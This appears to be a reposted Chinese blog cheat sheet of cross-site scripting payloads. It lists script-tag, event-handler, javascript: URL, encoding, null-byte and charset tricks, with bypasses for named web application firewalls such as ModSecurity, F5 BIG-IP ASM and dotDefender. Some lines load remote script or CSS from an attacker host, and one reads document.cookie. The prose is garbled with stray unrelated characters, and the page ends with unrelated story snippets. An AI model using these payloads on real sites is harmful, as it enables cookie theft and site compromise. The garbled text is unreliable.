XSS--LOG-1

XSS總結(jié):

????? ? xss分為三種,反射型xss扫腺,DOM型XSS及存儲型XSS绞旅,不同類型的XSS的危害不同,有興趣的可以觀看一下csdn上明智講的關(guān)于XSS攻擊及原理多艇。https://edu.csdn.net/course/detail/8585里面的修復(fù)原理和補丁代碼講的還是很詳細的逻恐,他的課程還有利用xss獲取cookie等。

<img src=x onerror=alert(1)>

通殺標(biāo)簽payload:

<aaaa id="c" onfocus="alert(1)" tabindex=0>

1峻黍、script標(biāo)簽

繞過進行一次移除操作:

<scr<script>ipt>alert("XSS")</scr<script>ipt>

Script 標(biāo)簽可以用于定義一個行內(nèi)的腳本或者從其他地方加載腳本:

<script>alert("XSS")</script>

<script src="http://attacker.org/malicious.js"></script>

1.2 JavaScript 事件

我們可以像如下這樣在元素中定義?JavaScript?事件:

<div onclick="alert('xss')">

這個 JavaScript 代碼當(dāng)有人點擊它后就會被執(zhí)行复隆,同時還有其他事件如頁面加載或移動鼠標(biāo)都可以觸發(fā)這些事件。絕大部分的時間都被過濾器所移除了姆涩,但是依舊還有少量事件沒有被過濾挽拂,例如,onmouseenter 事件:<divonmouseenter="alert('xss')">當(dāng)用戶鼠標(biāo)移動到 div 上時就會觸發(fā)我們的代碼阵面。

另一個繞過的辦法就是在屬性和= 之間插入一個空格:

<div onclick ="alert('xss')">

1.3 行內(nèi)樣式(Inlinestyle)

我們同樣可以在行內(nèi)樣式里利用?IE 瀏覽器支持的動態(tài)特性://IE5之后才支持

<div style="color: expression(alert('XSS'))">//experssion后執(zhí)行的語句相當(dāng)于javascript后執(zhí)行的語句

過濾器會檢查關(guān)鍵字 style轻局,隨后跟隨的不能是 <,在隨后是 expression:

/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis

所以样刷,讓我們需要把 < 放到其他地方:

<div style="color: '<'; color: expression(alert('XSS'))">

1.4 CSS import

IE 瀏覽器支持在 CSS 中擴展 JavaScript仑扑,這種技術(shù)稱為動態(tài)特性(dynamic properties)。允許攻擊者加載一個外部 CSS 樣式表是相當(dāng)危險的置鼻,因為攻擊者現(xiàn)在可以在原始頁面中執(zhí)行 JavaScript 代碼了镇饮。

<style>

@import url("http://attacker.org/malicious.css");

</style>

malicious.css:

body {

? ? color: expression(alert('XSS'));

}

為了繞過對 @import 的過濾,可以在 CSS 中使用反斜杠進行繞過:

<style>

@imp\ort url("http://attacker.org/malicious.css");

</style>

IE 瀏覽器會接受反斜杠箕母,但是我們繞過了過濾器储藐。

1.5 Javascript URL

鏈接標(biāo)簽里可以通過在 URL 中使用 javascript:… 來執(zhí)行 JavaScript:

<a href="javascript:alert('test')">link</a>

上面的過濾會從代碼中移除 javascript:,所以我們不能直接這么寫代碼嘶是。但我們可以嘗試改變 javascript:的寫法钙勃,使它依舊可以被瀏覽器執(zhí)行但又不匹配正則表達式。首先來嘗試下 URL 編碼:

<a href="Java&#115;cript:alert('xss')">link</a>

上面這段代碼不匹配正則表達式聂喇,但是瀏覽器依舊會執(zhí)行它辖源,因為瀏覽器會首先進行 URL 解碼操作蔚携。

另外,我們還可以使用 VBScript克饶,雖然它在 IE11 中被禁用了酝蜒,但依舊可以運行在舊版本的 IE 或者啟用兼容模式的 IE11 上。我們可以使用類似上面 JavaScript 的方式來插入 VBScript 代碼:

<a href='vbscript:MsgBox("XSS")'>link</a>

'-confirm`1`-'

'-confirm(1)-'

1.6 利用字符編碼

%c1;alert(/xss/);//

1.7 繞過長度限制

"onclick=alert(1)//

"><!--

--><script>alert(xss);<script>

1.8 使用<base>標(biāo)簽

<script>alert(navigator.userAgent)<script>

<script>alert(88199)</script>

<script>confirm(88199)</script>

<script>prompt(88199)</script>

<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>

<script>+alert(88199)</script>

<script>alert(/88199/)</script>

<script src=data:text/javascript,alert(88199)></script>

<scriptsrc=&#100&#97&#116&#97:text/javascript,alert(88199)></script>

<script>alert(String.fromCharCode(49,49))</script>

<script>alert(/88199/.source)</script>

<script>setTimeout(alert(88199),0)</script>

<script>document['write'](88199);</script>

<anytag onmouseover=alert(15)>M

<anytag onclick=alert(16)>M

<a onmouseover=alert(17)>M

<a onclick=alert(18)>M

<a href=javascript:alert(19)>M

<button/onclick=alert(20)>M

<form><button

formaction=javascript&colon;alert(21)>M

<form/action=javascript:alert(22)><input/type=submit>

<form onsubmit=alert(23)><button>M

<form onsubmit=alert(23)><button>M

<img src=x onerror=alert(24)> 29

<body/onload=alert(25)>

<body

onscroll=alert(26)><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br><br>

<input autofocus>

<iframe src="http://0x.lv/xss.swf"></iframe>

<iframe/onload=alert(document.domain)></iframe>

<IFRAME SRC="javascript:alert(29);"></IFRAME>

<meta http-equiv="refresh" content="0;

url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">^_^

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>

<object data="javascript:alert(document.domain)">

<marquee onstart=alert(30)></marquee>

<isindex type=image src=1 onerror=alert(31)>

<isindex action=javascript:alert(32) type=image>

<input onfocus=alert(33) autofocus>

<input onblur=alert(34) autofocus><input autofocus>

2.2.1 如果大小寫不行的話矾湃,<script>被過濾嘗試<scr<script>ipt>alert(1)</scr<script>ipt>亡脑;

2.2.2使用<a>標(biāo)簽測試

<a ?href=“http://www.google.com">Clickme</a>

<a被過濾?

href被過濾邀跃?

其他內(nèi)容被過濾霉咨?

如果沒有過濾嘗試使用

<a href=”javascript:alert(1)”>Clickme</a>

嘗試使用錯誤的事件查看過濾

<a href="rhainfosec.com"onclimbatree=alert(1)>ClickHere</a>

HTML5擁有150個事件處理函數(shù),可以多嘗試其他函數(shù)

<body/onhashchange=alert(1)><a href=#>clickit

2.3 測試其他標(biāo)簽

src屬性

<img src=x ? ? ?onerror=prompt(1);>

<img/src=aaa.jpg ? ? ?onerror=prompt(1);

<video src=x ? ? ?onerror=prompt(1);>

<audio src=x ? ? ?onerror=prompt(1);>

iframe

<iframesrc="javascript:alert(2)">

<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

<embed/src=//goo.gl/nlX0P>

Action

<form action="Javascript:alert(1)"><input type=submit>

<isindex action="javascript:alert(1)" type=image>

<isindexaction=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)type=image>

<isindex action=data:text/html, type=image>

mario驗證

<span class="pln"> ? ?</span><spanclass="tag">&lt;formaction</span><spanclass="pun">=</span><spanclass="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><spanclass="tag">&gt;&lt;button&gt;</span><spanclass="pln">CLICK</span>

“formaction”屬性

<isindexformaction="javascript:alert(1)" ? ??type=image>

<input type="image" formaction=JaVaScript:alert(0)>

?<form><buttonformaction=javascript&colon;alert(1)>CLICKME

“background”屬性

<table background=javascript:alert(1)></table> // Works on Opera10.5 ? ? ?and IE6

“posters” 屬性

<video poster=javascript:alert(1)//></video> // Works Upto Opera10.5

“data”屬性

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">

<object/data=//goo.gl/nlX0P?

“code”屬性

<applet code="javascript:confirm(document.cookie);"> // FirefoxOnly

<embed ?code="http://businessinfo.co.uk/labs/xss/xss.swf"? ? ?allowscriptaccess=always>

事件處理

<svg/onload=prompt(1);>

<marquee/onstart=confirm(2)>/

<body onload=prompt(1);>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<video><source onerror="javascript:alert(1)">

短payload

<q/oncut=open()>

<q/oncut=alert(1)> // ? ? ?Useful in-case of payloadrestrictions.

嵌套欺騙

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>

<body ?language=vbsonload=alert-1 // Works with IE8

<commandonmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6??9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>? ? ?// Works with IE8

圓括號被過濾

<a onmouseover="javascript:window.onerror=alert;throw 1">

<img src=x onerror="javascript:window.onerror=alert;throw 1">

<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;

Expression 屬性

<img style="xss:expression(alert(0))"> // Works upto IE7.

<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>? ? ?// Works upto IE7.

<style>#test{x:expression(alert(/XSS/))}</style> ? ??// Works upto IE7

“l(fā)ocation”屬性

<a onmouseover=location=’javascript:alert(1)>click

<body onfocus="location=&#039;javascrpt:alert(1) >123

其他Payload

<meta http-equiv="refresh" ? ??content="0;url=//goo.gl/nlX0P">

<meta http-equiv="refresh" ? ??content="0;javascript&colon;alert(1)"/>

<svg xmlns="http://www.w3.org/2000/svg"><g ? ??onload="javascript:\u0061lert(1);"></g></svg> //? ? ?By @secalert

<svg xmlns:xlink=" r=100 /><animateattributeName="xlink:href" ? ??values=";javascript:alert(1)" begin="0s" ?? ?dur="0.1s" fill="freeze"/> // By Mario

<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>? ? ?// By @secalert

<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon;alert(1)" http-equiv="refresh"/>

<math><a xlink:>click // ByAshar Javed

()坞嘀;:被過濾

<svg><script>alert&#40/1/&#41</script> ? ??// Works With All Browsers

( is html encoded to &#40

?) is html encoded to &#41

Opera的變量

<svg><script>alert&#40 ? ? ?1&#41 // Workswith Opera Only

實體解碼

&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;

<a?href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>

編碼

JavaScript是很靈活的語言躯护,可以使用十六進制、Unicode丽涩、HTML等進行編碼,以下屬性可以被編碼

(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)

href=

action=

formaction=

location=

on*=

name=

background=

poster=

src=

code=

data= //只支持base64

2.4 基于上下文的過濾

WAF最大的問題是不能理解內(nèi)容裁蚁,使用黑名單可以阻擋獨立的js腳本矢渊,但仍不能對xss提供足夠的保護,如果一個反射型的XSS是下面這種形式

2.4.1 輸入反射屬性

<inputvalue="XSStest" type=text>

我們可以使用 “><imgsrc=x ?onerror=prompt(0);>觸發(fā)枉证,但是如果<>被過濾矮男,我們?nèi)匀豢梢允褂谩?autofocusonfocus=alert(1)//觸發(fā),基本是使用“ 關(guān)閉value屬性室谚,再加入我們的執(zhí)行腳本

" onmouseover="prompt(0) x="

" onfocusin=alert(1) ? ? autofocus x="

" onfocusout=alert(1) ? ? autofocus x="

" onblur=alert(1) autofocus ? ? a="

輸入反射在<script>標(biāo)簽內(nèi)

類似這種情況:

<script>

Var

x=”Input”;

</script>

通常毡鉴,我們使用“></script>,閉合前面的</script>標(biāo)簽,然而在這種情況秒赤,我們也可以直接輸入執(zhí)行腳本alert(), prompt()

confirm() 猪瞬,例如:

“;alert(1)//

2.4.3 超文本內(nèi)容

代碼中的情況如下

<a

href=”Userinput”>Click</a>

可以使用javascript:alert(1)//直接執(zhí)行<a

href=”javascript:alert(1)//”>Click</a>

2.4.4 變形

主要包含大小寫和JavaScript變形

javascript&#058;alert(1)

javaSCRIPT&colon;alert(1)

JaVaScRipT:alert(1)

javas&Tab;cript:\u0061lert(1);

javascript:\u0061lert&#x28;1&#x29

avascript&#x3A;alert&lpar;document&period;cookie&rpar; ?? ?// AsharJaved

IE10以下和URI中可以使用VBScript

vbscript:alert(1);

vbscript&#058;alert(1);

vbscr&Tab;ipt:alert(1)"

Data URl

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

2.4.5JSON內(nèi)容

反射輸入

encodeURIComponent(&#039;userinput&#039;)

可以使用

-alert(1)-

-prompt(1)-

-confirm(1)-

結(jié)果

encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)

encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

2.4.6 輸入反射在svg標(biāo)簽內(nèi)

源碼如下:

<svg><script>varmyvar=”YourInput”;</script></svg>

可以輸入

www.site.com/test.PHP?var=text”;alert(1)//

如果系統(tǒng)編碼了”字符

<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>

原因是引入了附加的(XML)到HTML內(nèi)容里,可以使用2次編碼處理

瀏覽器BUG

2.4.7 字符集BUG

字符集BUG在IE中很普遍入篮,最早的bug是UTF-7陈瘦。如果能控制字符集編碼,我們可以繞過99% 的WAF過濾潮售。

示例

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制編碼痊项,提交

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img

src=x onerror=prompt(0);>

可以修改為UTF-32編碼形式

???script?alert(1)?/script?

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

2.4.8 空字節(jié)

最長用來繞過mod_security防火墻,形式如下:

<scri%00pt>alert(1);</scri%00pt>

<scri\x00pt>alert(1);</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字節(jié)只適用于PHP 5.3.8以上的版本

2.4.9 語法BUG

RFC聲明中節(jié)點名稱不能是空格酥诽,以下的形式在javascript中不能運行

<script>alert(1);</script>

<%0ascript>alert(1);</script>

<%0bscript>alert(1);</script>

<%, <//, <!,<?可以被解析成<鞍泉,所以可以使用以下的payload

<// ? ? style=x:expression\28write(1)\29> // Works upto IE7 參考http://html5sec.org/#71

<!--[if]><script>alert(1)</script ? ? --> // Worksupto IE9 參考http://html5sec.org/#115

<?xml-stylesheet ? ? type="text/css"?><root ?? style="x:expression(write(1))"/> // Works in IE7 參考http://html5sec.org/#77

<%div%20style=xss:expression(prompt(1))> ? ? // Works Upto IE7

2.4.10Unicode分隔符

[on\w+\s*]這個規(guī)則過濾了所有on事件,為了驗證每個瀏覽器中有效的分隔符肮帐,可以使用fuzzing方法測試0×00到0xff咖驮,結(jié)果如下:

IExplorer= ? ? [0x09,0x0B,0x0C,0x20,0x3B]

Chrome = ? ? [0x09,0x20,0x28,0x2C,0x3B]

Safari = [0x2C,0x3B]

FireFox= ? ? [0x09,0x20,0x28,0x2C,0x3B]

Opera = [0x09,0x20,0x2C,0x3B]

Android?= ? ? [0x09,0x20,0x28,0x2C,0x3B]

x0b在Mod_security中已經(jīng)被過濾,繞過的方法:

<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

2.4.11缺少X-frame選項

通常會認為X-frame是用來防護點擊劫持的配置,其實也可以防護使用iframe引用的xss漏洞

Docmodes

IE引入了doc-mode很長時間游沿,提供給老版本瀏覽器的后端兼容性饰抒,有風(fēng)險,攻擊情景是黑客可以引用你站點的框架诀黍,他可以引入doc-mode執(zhí)行css表達式

expression(open(alert(1)))

以下POC可以插入到IE7中

<html>

? ? <body>

? ? <meta http-equiv="X-UA-Compatible"content="IE=EmulateIE7" />

? ? <iframesrc="https://targetwebsite.com">

? ? </body>

? ? </html>

2.4.12Window.name欺騙

情景:我們用iframe加載一個頁面袋坑,我們可以控制窗口的名稱,這里也可以執(zhí)行javascript代碼

POC

<iframesrc=&#039;http://www.target.com?foo="xss?autofocus/AAAAA ?onfocus=location=window.name//&#039;

name="javascript:alert("XSS")"></iframe>

DOM型XSS

服務(wù)器不支持過濾DOM型的XSS眯勾,因為DOM型XSS總是在客戶端執(zhí)行枣宫,看一個例子:

<script>

? ? vari=location.hash;

? ? document.write(i);

? ? </script>

在一些情況下,反射型XSS可以轉(zhuǎn)換成DOM型XSS:

http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()

上面的POC只在[.+都被允許的情況下適用吃环,可以使用location.hash注入任何不允許的編碼

Location.hash[1] = : ?// Defined at the first position after ? ?the hash.

Location.hash[2]= ( ?// Defined at the second position after ? ?the has

Location.hash[3] = ) // Defined ? ? at third position after the hash.

如果有客戶端過濾可能不適用

2.4.13ModSecurity繞過

<scri%00pt>confirm(0);</scri%00pt>

<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

參考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

2.4.14WEB KNIGHT繞過

<isindexaction=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)type=image>

<marquee/onstart=confirm(2)>

F5 BIG IP ASM and Palo ALTO繞過

<table background="javascript:alert(1)"></table> //IE6或者低版本Opera

? ? “/><marquee?onfinish=confirm(123)>a</marquee>

Dot Defender繞過

<svg/onload=prompt(1);>?

<isindex action="javas&tab;cript:alert(1)" type=image>

<marquee/onstart=confirm(2)>

---------------------

作者:spang_33

來源:CSDN

原文:https://blog.csdn.net/spang_33/article/details/80930046

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末也颤,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子郁轻,更是在濱河造成了極大的恐慌翅娶,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,919評論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件好唯,死亡現(xiàn)場離奇詭異竭沫,居然都是意外死亡,警方通過查閱死者的電腦和手機骑篙,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,567評論 3 392
  • 文/潘曉璐 我一進店門蜕提,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人靶端,你說我怎么就攤上這事谎势。” “怎么了杨名?”我有些...
    開封第一講書人閱讀 163,316評論 0 353
  • 文/不壞的土叔 我叫張陵脏榆,是天一觀的道長。 經(jīng)常有香客問我镣煮,道長姐霍,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,294評論 1 292
  • 正文 為了忘掉前任典唇,我火速辦了婚禮镊折,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘介衔。我一直安慰自己恨胚,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,318評論 6 390
  • 文/花漫 我一把揭開白布炎咖。 她就那樣靜靜地躺著赃泡,像睡著了一般寒波。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上升熊,一...
    開封第一講書人閱讀 51,245評論 1 299
  • 那天俄烁,我揣著相機與錄音,去河邊找鬼级野。 笑死页屠,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的蓖柔。 我是一名探鬼主播辰企,決...
    沈念sama閱讀 40,120評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼况鸣!你這毒婦竟也來了牢贸?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,964評論 0 275
  • 序言:老撾萬榮一對情侶失蹤镐捧,失蹤者是張志新(化名)和其女友劉穎潜索,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體懂酱,經(jīng)...
    沈念sama閱讀 45,376評論 1 313
  • 正文 獨居荒郊野嶺守林人離奇死亡帮辟,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,592評論 2 333
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了玩焰。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,764評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡芍锚,死狀恐怖昔园,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情并炮,我是刑警寧澤默刚,帶...
    沈念sama閱讀 35,460評論 5 344
  • 正文 年R本政府宣布,位于F島的核電站逃魄,受9級特大地震影響荤西,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜伍俘,卻給世界環(huán)境...
    茶點故事閱讀 41,070評論 3 327
  • 文/蒙蒙 一邪锌、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧癌瘾,春花似錦觅丰、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,697評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽蜕企。三九已至,卻和暖如春冠句,著一層夾襖步出監(jiān)牢的瞬間轻掩,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,846評論 1 269
  • 我被黑心中介騙來泰國打工懦底, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留唇牧,地道東北人。 一個月前我還...
    沈念sama閱讀 47,819評論 2 370
  • 正文 我出身青樓基茵,卻偏偏與公主長得像奋构,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子拱层,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,665評論 2 354

推薦閱讀更多精彩內(nèi)容

  • XSS常見Payload總結(jié) XSS漏洞的存在與發(fā)生伴隨兩個概念: 輸入函數(shù)和輸出函數(shù)弥臼。XSS攻擊Payload...
    BerL1n閱讀 2,732評論 0 3
  • 之前積累了XSS 有一段時間,因為目前開始了一件有趣的工程根灯,需要整合非常多的知識径缅,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,058評論 0 16
  • 淺談XSS—字符編碼和瀏覽器解析原理 XSS簡介 XSS攻擊全稱跨站腳本攻擊,是為不和層疊樣式表(Cascadin...
    Smi1e_閱讀 4,638評論 2 3
  • 南方有佳木烙肺,北燕急歸去纳猪。近凰情意怯,遲遲不相與桃笙。秋風(fēng)起蕭瑟氏堤,綿綿涼雨稀。奈何花地落搏明,原是陌路行鼠锈。
    南依小筑閱讀 146評論 0 1
  • 用起來,用起來星著,用起來才是硬道理购笆。 ——題記 ...
    拈花微笑612閱讀 922評論 0 1